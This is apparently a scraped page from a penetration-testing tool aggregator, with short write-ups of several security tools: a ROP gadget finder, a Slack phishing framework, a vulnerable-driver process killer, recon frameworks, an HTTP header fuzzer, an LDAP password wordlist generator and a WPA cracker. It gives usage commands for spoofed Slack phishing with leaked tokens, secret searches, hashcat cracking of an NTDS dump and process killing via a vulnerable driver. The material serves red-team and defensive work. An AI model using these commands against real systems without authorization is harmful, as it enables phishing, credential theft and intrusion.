    Scanning is currently not supported on SPA (Single Page Application) web applications; we have only tested the tool on websites built with PHP, with strong results. SPA support is planned for a future release.




    Note:

    This tool maintains an up-to-date list of file extensions that it skips during the exploration process. The default list includes common file types such as images, stylesheets, and scripts (".css", ".js", ".mp4", ".zip", ".png", ".svg", ".jpeg", ".webp", ".jpg", ".gif"). You can customize this list to better suit your needs by editing the setting.json file.
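    A minimal sketch of how such a skip list is typically applied during crawling (the function name and logic are my own illustration, not X-Recon's code):

    ```python
    SKIP_EXTENSIONS = (".css", ".js", ".mp4", ".zip", ".png", ".svg",
                       ".jpeg", ".webp", ".jpg", ".gif")

    def should_crawl(url: str) -> bool:
        # Drop the query string and fragment, then check the path's extension
        path = url.split("?", 1)[0].split("#", 1)[0]
        return not path.lower().endswith(SKIP_EXTENSIONS)
    ```

    With this filter, http://testphp.vulnweb.com/login.php would be explored while style.css?v=2 would be skipped.
    
    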

    Installation

    $ git clone https://github.com/joshkar/X-Recon
    $ cd X-Recon
    $ python3 -m pip install -r requirements.txt
    $ python3 xr.py

    Target For Test:

    You can use this address in the Get URL section

      http://testphp.vulnweb.com


    ☐ ☆ ✇ KitPloit - PenTest Tools!

    ROPDump - A Command-Line Tool Designed To Analyze Binary Executables For Potential Return-Oriented Programming (ROP) Gadgets, Buffer Overflow Vulnerabilities, And Memory Leaks

    By: Zion3R — June 4th 2024 at 12:30


    ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.


    Features

    • Identifies potential ROP gadgets in binary executables.
    • Detects potential buffer overflow vulnerabilities by analyzing vulnerable functions.
    • Generates exploit templates to make the exploit process faster
    • Identifies potential memory leak vulnerabilities by analyzing memory allocation functions.
    • Can print function names and addresses for further analysis.
    • Supports searching for specific instruction patterns.
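    To make the gadget idea concrete, here is a toy byte-scan for short sequences ending in RET (0xC3); this is only an illustration of the concept, not ROPDump's actual algorithm:

    ```python
    # Toy gadget scan: collect short byte sequences that end in RET (0xC3).
    # Real tools disassemble properly; this is a conceptual sketch only.
    RET = 0xC3

    def find_gadgets(code: bytes, max_len: int = 4):
        gadgets = []
        for i, byte in enumerate(code):
            if byte == RET:
                # Record every suffix of up to max_len bytes ending at this RET
                for start in range(max(0, i - max_len), i):
                    gadgets.append((start, code[start:i + 1]))
        return gadgets

    # nop; pop eax; ret; nop; pop edi; ret
    blob = bytes.fromhex("9058c3905fc3")
    found = [g for _, g in find_gadgets(blob)]
    ```
    
    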

    Usage

    • <binary>: Path to the binary file for analysis.
    • -s, --search SEARCH: Optional. Search for specific instruction patterns.
    • -f, --functions: Optional. Print function names and addresses.

    Examples

    • Analyze a binary without searching for specific instructions:

    python3 ropdump.py /path/to/binary

    • Analyze a binary and search for specific instructions:

    python3 ropdump.py /path/to/binary -s "pop eax"

    • Analyze a binary and print function names and addresses:

    python3 ropdump.py /path/to/binary -f



    ☐ ☆ ✇ KitPloit - PenTest Tools!

    Startup-SBOM - A Tool To Reverse Engineer And Inspect The RPM And APT Databases To List All The Packages Along With Executables, Service And Versions

    By: Zion3R — June 3rd 2024 at 12:30


    This is a simple SBOM utility which aims to provide an insider view on which packages are getting executed.

    The process and objective are simple: get a clear view of the packages installed by APT (support for RPM and other package managers is in progress). This is mainly needed to check which packages are actually being executed.
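    For background, APT-based images record installed packages in dpkg's status database (/var/lib/dpkg/status). A rough sketch of parsing that paragraph-based format, assumed here for illustration rather than taken from the tool:

    ```python
    # Sketch (my assumption, not the tool's actual code) of reading a
    # dpkg status database to list installed packages and versions.
    SAMPLE = """Package: bash
    Status: install ok installed
    Version: 5.2-2

    Package: curl
    Status: install ok installed
    Version: 7.88.1-10
    """

    def parse_dpkg_status(text):
        packages, current = [], {}
        for line in text.splitlines():
            if not line.strip():              # blank line ends a paragraph
                if current:
                    packages.append(current)
                    current = {}
            elif not line.startswith(" ") and ":" in line:
                key, _, value = line.partition(":")
                current[key] = value.strip()
        if current:
            packages.append(current)
        return packages

    installed = parse_dpkg_status(SAMPLE)
    ```
    
    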


    Installation

    The packages needed are mentioned in the requirements.txt file and can be installed using pip:

    pip3 install -r requirements.txt

    Usage

    • First of all install the packages.
    • Secondly, you need to set up environment variables such as:
      • Mount the image: Currently I am still working on a mechanism to automatically define a mount point and mount different types of images and volumes, but it is still quite a task.
    • Finally run the tool to list all the packages.
    Argument Description
    --analysis-mode Specifies the mode of operation. Default is static. Choices are static and chroot.
    --static-type Specifies the type of analysis for static mode. Required for static mode only. Choices are info and service.
    --volume-path Specifies the path to the mounted volume. Default is /mnt.
    --save-file Specifies the output file for JSON output.
    --info-graphic Specifies whether to generate visual plots for CHROOT analysis. Default is True.
    --pkg-mgr Manually specify the package manager, or omit this option for automatic detection.
    APT:
    - Static Info Analysis:
    - This command runs the program in static analysis mode, specifically using the Info Directory analysis method.
    - It analyzes the packages installed on the mounted volume located at /mnt.
    - It saves the output in a JSON file named output.json.
    - It generates visual plots for CHROOT analysis.
    ```bash
    python3 main.py --pkg-mgr apt --analysis-mode static --static-type info --volume-path /mnt --save-file output.json
    ```
    • Static Service Analysis:

    • This command runs the program in static analysis mode, specifically using the Service file analysis method.
    • It analyzes the packages installed on the mounted volume located at /custom_mount.
    • It saves the output in a JSON file named output.json.
    • It does not generate visual plots for CHROOT analysis.

    ```bash
    python3 main.py --pkg-mgr apt --analysis-mode static --static-type service --volume-path /custom_mount --save-file output.json --info-graphic False
    ```

    • Chroot analysis with or without graphic output:

    • This command runs the program in chroot analysis mode.
    • It analyzes the packages installed on the mounted volume located at /mnt.
    • It saves the output in a JSON file named output.json.
    • It generates visual plots for CHROOT analysis.
    • For graphical output keep --info-graphic as True, else False.

    ```bash
    python3 main.py --pkg-mgr apt --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
    ```

    RPM - Static Analysis:
    - Similar to how it is done on APT, but only one type of static scan is available for now.

    ```bash
    python3 main.py --pkg-mgr rpm --analysis-mode static --volume-path /mnt --save-file output.json
    ```

    • Chroot analysis with or without graphic output:
    • Exactly as on APT.

    ```bash
    python3 main.py --pkg-mgr rpm --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
    ```

    Supporting Images

    Currently the tool works on Debian and Red Hat based images. I can guarantee the Debian outputs, but the Red Hat ones still need work; they are not perfect yet.

    I am working on the pacman side of things, trying to find a reliable way of accessing the pacman db for static analysis.

    Graphical Output Images (Chroot)

    APT Chroot

    RPM Chroot

    Inner Workings

    For the workings and process related documentation please read the wiki page: Link

    TODO

    • [x] Support for RPM
    • [x] Support for APT
    • [x] Support for Chroot Analysis
    • [x] Support for Versions
    • [x] Support for Chroot Graphical output
    • [x] Support for organized graphical output
    • [ ] Support for Pacman

    Ideas and Discussions

    Ideas regarding this topic are welcome in the discussions page.



    ☐ ☆ ✇ KitPloit - PenTest Tools!

    EvilSlackbot - A Slack Bot Phishing Framework For Red Teaming Exercises

    By: Zion3R — June 2nd 2024 at 12:30

    EvilSlackbot

    A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.

    Disclaimer

    This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.


    Background

    Thousands of organizations utilize Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that can be used to automate different tasks within Slack. These bots are individually granted permissions that dictate what tasks the bot is permitted to request via the Slack API. To authenticate to the Slack API, each bot is assigned an API token that begins with xoxb or xoxp. More often than not, these tokens are leaked somewhere. When these tokens are exfiltrated during a Red Team exercise, it can be a pain to properly utilize them. Now EvilSlackbot is here to automate and streamline that process. You can use EvilSlackbot to send spoofed Slack messages, phishing links, and files, and to search for secrets leaked in Slack.

    Phishing Simulations

    In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To use EvilSlackbot to conduct a Slack phishing exercise, simply create a bot within Slack, give your bot the permissions required for your intended test, and provide EvilSlackbot with a list of emails of employees you would like to test with simulated phishes (Links, files, spoofed messages)

    Installation

    EvilSlackbot requires python3 and Slackclient

    pip3 install slackclient

    Usage

    usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]
    [-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]

    options:
    -h, --help show this help message and exit

    Required:
    -t TOKEN, --token TOKEN
    Slack Oauth token

    Attacks:
    -sP, --spoof Spoof a Slack message, customizing your name, icon, etc
    (Requires -e,-eL, or -cH)
    -m, --message Send a message as the bot associated with your token
    (Requires -e,-eL, or -cH)
    -s, --search Search slack for secrets with a keyword
    -a, --attach Send a message containing a malicious attachment (Requires -f
    and -e,-eL, or -cH)

    Arguments:
    -f FILE, --file FILE Path to file attachment
    -e EMAIL, --email EMAIL
    Email of target
    -cH CHANNEL, --channel CHANNEL
    Target Slack Channel (Do not include #)
    -eL EMAIL_LIST, --email_list EMAIL_LIST
    Path to list of emails separated by newline
    -c, --check Lookup and display the permissions and available attacks
    associated with your provided token.
    -o OUTFILE, --outfile OUTFILE
    Outfile to store search results
    -cL, --channel_list List all public Slack channels

    Token

    To use this tool, you must provide a xoxb or xoxp token.

    Required:
    -t TOKEN, --token TOKEN (Slack xoxb/xoxp token)
    python3 EvilSlackbot.py -t <token>

    Attacks

    Depending on the permissions associated with your token, there are several attacks that EvilSlackbot can conduct. EvilSlackbot will automatically check what permissions your token has and will display them and any attack that you are able to perform with your given token.
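    Conceptually, this check maps the token's granted scopes to the attacks they enable. A hypothetical sketch of that mapping (the scope requirements shown are illustrative assumptions, not EvilSlackbot's exact table):

    ```python
    # Hypothetical scope -> attack mapping to illustrate the idea behind -c/--check.
    # The exact scopes EvilSlackbot requires may differ; these are assumptions.
    REQUIRED_SCOPES = {
        "spoof (-sP)": {"chat:write", "chat:write.customize"},
        "message (-m)": {"chat:write"},
        "search (-s)": {"search:read"},
        "attach (-a)": {"chat:write", "files:write"},
    }

    def available_attacks(token_scopes):
        granted = set(token_scopes)
        # An attack is available when all of its required scopes are granted
        return [attack for attack, needed in REQUIRED_SCOPES.items()
                if needed <= granted]

    attacks = available_attacks(["chat:write", "files:write"])
    ```
    
    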

    Attacks:
    -sP, --spoof Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)

    -m, --message Send a message as the bot associated with your token (Requires -e,-eL, or -cH)

    -s, --search Search slack for secrets with a keyword

    -a, --attach Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)

    Spoofed messages (-sP)

    With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the botname and bot photo. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

    python3 EvilSlackbot.py -t <xoxb token> -sP -e <email address>

    python3 EvilSlackbot.py -t <xoxb token> -sP -eL <email list>

    python3 EvilSlackbot.py -t <xoxb token> -sP -cH <Channel name>

    Phishing Messages (-m)

    With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the Spoofed attack is that this method will send the message as the bot associated with your provided token. You will not be able to choose the name or image of the bot sending your phish. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

    python3 EvilSlackbot.py -t <xoxb token> -m -e <email address>

    python3 EvilSlackbot.py -t <xoxb token> -m -eL <email list>

    python3 EvilSlackbot.py -t <xoxb token> -m -cH <Channel name>

    Secret Search (-s)

    With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires an xoxp token, as xoxb tokens cannot be given the proper permissions to keyword search within Slack. Use the -o argument to write the search results to an outfile.

    python3 EvilSlackbot.py -t <xoxp token> -s -o <outfile.txt>

    Attachments (-a)

    With the correct token permissions, EvilSlackbot allows you to send file attachments. The attachment attack requires a path to the file (-f) you wish to send. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

    python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -e <email address>

    python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -eL <email list>

    python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -cH <Channel name>

    Arguments

    Arguments:
    -f FILE, --file FILE Path to file attachment
    -e EMAIL, --email EMAIL Email of target
    -cH CHANNEL, --channel CHANNEL Target Slack Channel (Do not include #)
    -eL EMAIL_LIST, --email_list EMAIL_LIST Path to list of emails separated by newline
    -c, --check Lookup and display the permissions and available attacks associated with your provided token.
    -o OUTFILE, --outfile OUTFILE Outfile to store search results
    -cL, --channel_list List all public Slack channels

    Channel Search

    With the correct permissions, EvilSlackbot can search for and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages. Use -o to write the list to an outfile.

    python3 EvilSlackbot.py -t <xoxb token> -cL


    ☐ ☆ ✇ KitPloit - PenTest Tools!

    Reaper - Proof Of Concept On BYOVD Attack

    By: Zion3R — June 1st 2024 at 12:30


    Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate, vulnerable driver into a target system, which allows attackers to exploit the driver to perform malicious actions.

    Reaper was specifically designed to exploit the vulnerability present in the kprocesshacker.sys driver in version 2.8.0.0, taking advantage of its weaknesses to gain privileged access and control over the target system.

    Note: Reaper does not kill the Windows Defender process, as that process is protected; Reaper is a simple proof of concept.


    Features

    • Kill process
    • Suspend process

    Help

          ____
    / __ \___ ____ _____ ___ _____
    / /_/ / _ \/ __ `/ __ \/ _ \/ ___/
    / _, _/ __/ /_/ / /_/ / __/ /
    /_/ |_|\___/\__,_/ .___/\___/_/
    /_/

    [Coded by MrEmpy]
    [v1.0]

    Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]
    Options:
    sp, suspend process
    kp, kill process

    Values:
    PROCESSID process id to suspend/kill

    Examples:
    Reaper.exe sp 1337
    Reaper.exe kp 1337

    Demonstration

    Install

    You can compile it directly from the source code or download it already compiled. You will need Visual Studio 2022 to compile.

    Note: The executable and driver must be in the same directory.



    ☐ ☆ ✇ KitPloit - PenTest Tools!

    Ars0N-Framework - A Modern Framework For Bug Bounty Hunting

    By: Zion3R — May 31st 2024 at 12:30



    Howdy! My name is Harrison Richardson, or rs0n (arson) when I want to feel cooler than I really am. The code in this repository started as a small collection of scripts to help automate many of the common Bug Bounty hunting processes I found myself repeating. Over time, I built a simple web application with a MongoDB connection to manage my findings and identify valuable data points. After 5 years of Bug Bounty hunting, both part-time and full-time, I'm finally ready to package this collection of tools into a proper framework.


    The Ars0n Framework is designed to provide aspiring Application Security Engineers with all the tools they need to leverage Bug Bounty hunting as a means to learn valuable, real-world AppSec concepts and make πŸ’° doing it! My goal is to lower the barrier of entry for Bug Bounty hunting by providing easy-to-use automation tools in combination with educational content and how-to guides for a wide range of Web-based and Cloud-based vulnerabilities. In combination with my YouTube content, this framework will help aspiring Application Security Engineers to quickly and easily understand real-world security concepts that directly translate to a high paying career in Cyber Security.

    In addition to using this tool for Bug Bounty Hunting, aspiring engineers can also use this Github Repository as a canvas to practice collaborating with other developers! This tool was inspired by Metasploit and designed to be modular in a similar way. Each Script (Ex: wildfire.py or slowburn.py) is basically an algorithm that runs the Modules (Ex: fire-starter.py or fire-scanner.py) in a specific pattern for a desired result. Because of this design, the community is free to build new Scripts to solve a specific use-case or Modules to expand the results of these Scripts. By learning the code in this framework and using Github to contribute your own code, aspiring engineers will continue to learn real-world skills that can be applied on the first day of a Security Engineer I position.

    My hope is that this modular framework will act as a canvas to help share what I've learned over my career to the next generation of Security Engineers! Trust me, we need all the help we can get!!


    Quick Start

    Paste this code block into a clean installation of Kali Linux 2023.4 to download, install, and run the latest stable Alpha version of the framework:

    sudo apt update && sudo apt-get update
    sudo apt -y upgrade && sudo apt-get -y upgrade
    wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
    tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
    rm ars0n-framework-v0.0.2-alpha.tar.gz
    cd ars0n-framework
    ./install.sh

    Download Latest Stable ALPHA Version

    wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
    tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
    rm ars0n-framework-v0.0.2-alpha.tar.gz

    Install

    The Ars0n Framework includes a script that installs all the necessary tools, packages, etc. that are needed to run the framework on a clean installation of Kali Linux 2023.4.

    Please note that the only supported installation of this framework is on a clean installation of Kali Linux 2023.4. If you choose to try and run the framework outside of a clean Kali install, I will not be able to help troubleshoot any issues you have.

    ./install.sh

    This video shows exactly what to expect from a successful installation.

    If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

    ./install.sh --arm

    You will be prompted to enter various API keys and tokens when the installation begins. Entering these is not required to run the core functionality of the framework. If you do not enter these API keys and tokens at the time of installation, simply hit enter at each of the prompts. The keys can be added later to the ~/.keys directory. More information about how to add these keys manually can be found in the Frequently Asked Questions section of this README.

    Run the Web Application (Client and Server)

    Once the installation is complete, you will be given the option to run the application by entering Y. If you choose not to run the application immediately, or if you need to run the application after a reboot, simply navigate to the root directory and run the run.sh bash script.

    ./run.sh

    If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

    ./run.sh --arm

    Core Modules

    The Ars0n Framework's Core Modules are used to determine the basic scanning logic. Each script is designed to support a specific recon methodology based on what the user is trying to accomplish.

    Wildfire

    At this time, the Wildfire script is the most widely used Core Module in the Ars0n Framework. The purpose of this module is to allow the user to scan multiple targets that allow for testing on any subdomain discovered by the researcher.

    How it works:

    1. The user adds root domains through the Graphical User Interface (GUI) that they wish to scan for hidden subdomains
    2. Wildfire sorts each of these domains based on the last time they were scanned to ensure the domain with the oldest data is scanned first
    3. Wildfire scans each of the domains using the Sub-Modules based on the flags provided by the user.
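    Step 2 above is a simple oldest-first ordering; a sketch of the idea (illustrative only, not the framework's code):

    ```python
    # Order domains so the one with the oldest scan data is scanned first.
    from datetime import datetime

    targets = [
        {"fqdn": "a.example.com", "last_scanned": datetime(2024, 5, 1)},
        {"fqdn": "b.example.com", "last_scanned": datetime(2024, 3, 15)},
        {"fqdn": "c.example.com", "last_scanned": datetime(2024, 4, 20)},
    ]

    # Oldest timestamp sorts first, so stale data gets refreshed soonest
    queue = sorted(targets, key=lambda t: t["last_scanned"])
    ```
    
    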

    Most Wildfire scans take between 8 and 48 hours to complete against a single domain if all Sub-Modules are being run. Variations in this timing can be caused by a number of factors, including the target application and the machine running the framework.

    Also, please note that most data will not show in the GUI until the scan has completed. It's best to run the scan overnight or over a weekend, depending on the number of domains being scanned, and return once the scan has completed to move from Recon to Enumeration.

    Running Wildfire:

    Graphical User Interface (GUI)

    Wildfire can be run from the GUI using the Wildfire button on the dashboard. Once clicked, the front-end will use the checkboxes on the screen to determine what flags should be passed to the scanner.

    Please note that running scans from the GUI still has a few bugs and edge cases that haven't been sorted out. If you have any issues, you can simply run the scan from the CLI.

    Command Line Interface (CLI)

    All Core Modules for The Ars0n Framework are stored in the /toolkit directory. Simply navigate to the directory and run wildfire.py with the necessary flags. At least one Sub-Module flag must be provided.

    python3 wildfire.py --start --cloud --scan

    Slowburn

    Unlike the Wildfire module, which requires the user to identify target domains to scan, the Slowburn module does that work for you. By communicating with APIs for various bug bounty hunting platforms, this script will identify all domains that allow for testing on any discovered subdomain. Once the data has been populated, Slowburn will randomly choose one domain at a time to scan in the same way Wildfire does.

    Please note that the Slowburn module is still in development and is not considered part of the stable alpha release. There will likely be bugs and edge cases encountered by the user.

    In order for Slowburn to identify targets to scan, it must first be initialized. This initialization step collects the necessary data from various APIs and deposits it into a JSON file stored locally. Once this initialization step is complete, Slowburn will automatically begin selecting and scanning one target at a time.

    To initialize Slowburn, simply run the following command:

    python3 slowburn.py --initialize

    Once the data has been collected, it is up to the user whether they want to re-initialize the tool upon the next scan.

    Remember that the scope and targets on public bug bounty programs can change frequently. If you choose to run Slowburn without initializing the data, you may be scanning domains that are no longer in scope for the program. It is strongly recommended that Slowburn be re-initialized each time before running.

    If you choose not to re-initialize the target data, you can run Slowburn using the previously collected data with the following command:

    python3 slowburn.py

    Sub-Modules

    The Ars0n Framework's Sub-Modules are designed to be leveraged by the Core Modules to divide the Recon & Enumeration phases into specific tasks. The data collected in each Sub-Module is used by the others to expand your picture of the target's attack surface.

    Fire-Starter

    Fire-Starter is the first step to performing recon against a target domain. The goal of this script is to collect a wealth of information about the attack surface of your target. Once collected, this data will be used by all other Sub-Modules to help the user identify a specific URL that is potentially vulnerable.

    Fire-Starter works by running a series of open-source tools to enumerate hidden subdomains, DNS records, and ASNs to identify where those external entries are hosted. Currently, Fire-Starter chains together the following widely used open-source tools:

    • Amass
    • Sublist3r
    • Assetfinder
    • Get All URL's (GAU)
    • Certificate Transparency Logs (CRT)
    • Subfinder
    • ShuffleDNS
    • GoSpider
    • Subdomainizer

    These tools cover a wide range of techniques to identify hidden subdomains, including web scraping, brute force, and crawling to identify links and JavaScript URLs.

    Once the scan is complete, the Dashboard will be updated and available to the user.

    Most Sub-Modules in The Ars0n Framework require the data collected from the Fire-Starter module to work. With this in mind, Fire-Starter must be included in the first scan against a target for any usable data to be collected.

    Fire-Cloud

    Coming soon...

    Fire-Scanner

    Fire-Scanner uses the results of Fire-Starter and Fire-Cloud to perform Wide-Band Scanning against all subdomains and cloud services that have been discovered from previous scans.

    At this stage of development, this script leverages Nuclei almost exclusively for all scanning. Instead of simply running the tool, Fire-Scanner breaks the scan down into specific collections of Nuclei Templates and scans them one by one. This strategy helps ensure the scans are stable and produce consistent results, removes any unnecessary or unsafe scan checks, and produces actionable results.

    Troubleshooting

    The vast majority of issues installing and/or running the Ars0n Framework are caused by not installing the tool on a clean installation of Kali Linux.

    It is important to remember that, at its core, the Ars0n Framework is a collection of automation scripts designed to run existing open-source tools. Each of these tools has its own way of operating and can experience unexpected behavior if conflicts emerge with any existing service/tool running on the user's system. This complexity is the reason why The Ars0n Framework should only be run on a clean installation of Kali Linux.

    Another very common issue is MongoDB failing to install and/or run on the user's machine. The most common manifestation is that the user is unable to add an initial FQDN and simply sees a broken GUI. If this occurs, please ensure that your machine meets the system requirements to run MongoDB. Unfortunately, there is no current workaround if you run into this issue.

    Frequently Asked Questions

    Coming soon...



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Headerpwn - A Fuzzer For Finding Anomalies And Analyzing How Servers Respond To Different HTTP Headers

    By: Zion3R β€” May 30th 2024 at 12:30

    Install

    To install headerpwn, run the following command:

    go install github.com/devanshbatham/headerpwn@v0.0.3

    Usage

    headerpwn allows you to test various headers on a target URL and analyze the responses. Here's how to use the tool:

    1. Provide the target URL using the -url flag.
    2. Create a file containing the headers you want to test, one header per line. Use the -headers flag to specify the path to this file.

    Example usage:

    headerpwn -url https://example.com -headers my_headers.txt
    • Format of my_headers.txt should be like below:
    Proxy-Authenticate: foobar
    Proxy-Authentication-Required: foobar
    Proxy-Authorization: foobar
    Proxy-Connection: foobar
    Proxy-Host: foobar
    Proxy-Http: foobar

    Proxying requests through Burp Suite:

    Follow these steps to proxy requests through Burp Suite:

    • Export Burp's Certificate:

      • In Burp Suite, go to the "Proxy" tab.
      • Under the "Proxy Listeners" section, select the listener that is configured for 127.0.0.1:8080
      • Click on the "Import / Export CA Certificate" button.
      • In the certificate window, click "Export Certificate" and save the certificate file (e.g., burp.der).
    • Install Burp's Certificate:

      • Install the exported certificate as a trusted certificate on your system. How you do this depends on your operating system.
      • On Windows, you can double-click the exported certificate file and follow the prompts to install it in the "Trusted Root Certification Authorities" store.
      • On macOS, you can double-click the certificate file and add it to the "System" keychain via the "Keychain Access" application.
      • On Linux, you may need to copy the certificate to a trusted-certificate location and configure your system to trust it.

    You should be all set:

    headerpwn -url https://example.com -headers my_headers.txt -proxy 127.0.0.1:8080

    Credits

    The headers.txt file is compiled from various sources, including the SecLists project. These headers are used for testing purposes and provide a variety of scenarios for analyzing how servers respond to different headers.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    LDAPWordlistHarvester - A Tool To Generate A Wordlist From The Information Present In LDAP, In Order To Crack Passwords Of Domain Accounts

    By: Zion3R β€” May 29th 2024 at 12:30


    A tool to generate a wordlist from the information present in LDAP, in order to crack non-random passwords of domain accounts.

    Β 

    Features

    The bigger the domain is, the better the wordlist will be.

    • [x] Creates a wordlist based on the following information found in the LDAP:
    • [x] User: name and sAMAccountName
    • [x] Computer: name and sAMAccountName
    • [x] Groups: name
    • [x] Organizational Units: name
    • [x] Active Directory Sites: name and descriptions
    • [x] All LDAP objects: descriptions
    • [x] Choose wordlist output file name with option --outputfile

    Demonstration

    To generate a wordlist from the LDAP of the domain domain.local you can use this command:

    ./LDAPWordlistHarvester.py -d 'domain.local' -u 'Administrator' -p 'P@ssw0rd123!' --dc-ip 192.168.1.101
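The core idea, turning LDAP names and descriptions into password candidates, can be sketched as follows (the splitting and case rules here are illustrative; the real tool's derivation rules may differ):

```python
import re

def candidates(ldap_value: str) -> set[str]:
    """Derive simple wordlist candidates from one LDAP string:
    the whole value, its individual words, and common case variants."""
    words = re.split(r"[\s\-_.@,]+", ldap_value)
    out = set()
    for word in [ldap_value] + words:
        word = word.strip()
        if len(word) >= 3:  # skip very short fragments
            out.update({word, word.lower(), word.upper(), word.capitalize()})
    return out
```

For example, a group named `IT-Helpdesk` yields candidates such as `helpdesk`, `Helpdesk`, `HELPDESK`, and the full `IT-Helpdesk`, which hashcat's rules then mutate further.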

    You will get the following output if using the Python version:

    You will get the following output if using the PowerShell version:


    Cracking passwords

    Once you have this wordlist, you can crack your NTDS dump using hashcat with --loopback and the clem9669_large.rule rule:

    ./hashcat --hash-type 1000 --potfile-path ./client.potfile ./client.ntds ./wordlist.txt --rules ./clem9669_large.rule --loopback

    Usage

    $ ./LDAPWordlistHarvester.py -h
    LDAPWordlistHarvester.py v1.1 - by @podalirius_

    usage: LDAPWordlistHarvester.py [-h] [-v] [-o OUTPUTFILE] --dc-ip ip address [-d DOMAIN] [-u USER] [--ldaps] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k]

    options:
    -h, --help show this help message and exit
    -v, --verbose Verbose mode. (default: False)
    -o OUTPUTFILE, --outputfile OUTPUTFILE
    Path to output file of wordlist.

    Authentication & connection:
    --dc-ip ip address IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
    -d DOMAIN, --domain DOMAIN
    (FQDN) domain to authenticate to
    -u USER, --user USER user to authenticate with
    --ldaps Use LDAPS instead of LDAP

    Credentials:
    --no-pass Don't ask for password (useful for -k)
    -p PASSWORD, --password PASSWORD
    Password to authenticate with
    -H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
    NT/LM hashes, format is LMhash:NThash
    --aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits)
    -k, --kerberos Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Pyrit - The Famous WPA Precomputed Cracker

    By: Zion3R β€” May 28th 2024 at 12:30


    Pyrit allows you to create massive databases that pre-compute the WPA/WPA2-PSK authentication phase in a space-time tradeoff. By using the computational power of multi-core CPUs and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security protocols.

    WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre-shared key. This master key is derived from a password which the administrating user has to pre-configure, e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate subsequent traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home and small-office use, at the cost of making the protocol vulnerable to brute-force attacks against its key negotiation phase; these ultimately allow an attacker to reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous because the protocol allows much of the key derivation to be pre-computed, making simple brute-force attacks even more alluring to the attacker. For more background see this article on the project's blog (outdated).


    The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.

    Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms, including FreeBSD, MacOS X and Linux as operating systems and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc processors.

    Attacking WPA/WPA2 by brute force boils down to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10,000 PMKs per second is equivalent to hashing 9.8 gigabytes of data with SHA1 in one second.
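The PMK computation Pyrit pre-computes is standard PBKDF2-HMAC-SHA1 over the passphrase, with the SSID as salt, 4096 iterations and a 256-bit output. A minimal sketch using Python's stdlib (this is the WPA/WPA2-PSK key derivation itself, not Pyrit's optimized implementation):

```python
import hashlib

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK Pairwise Master Key: PBKDF2-HMAC-SHA1,
    SSID as salt, 4096 iterations, 256-bit output."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)
```

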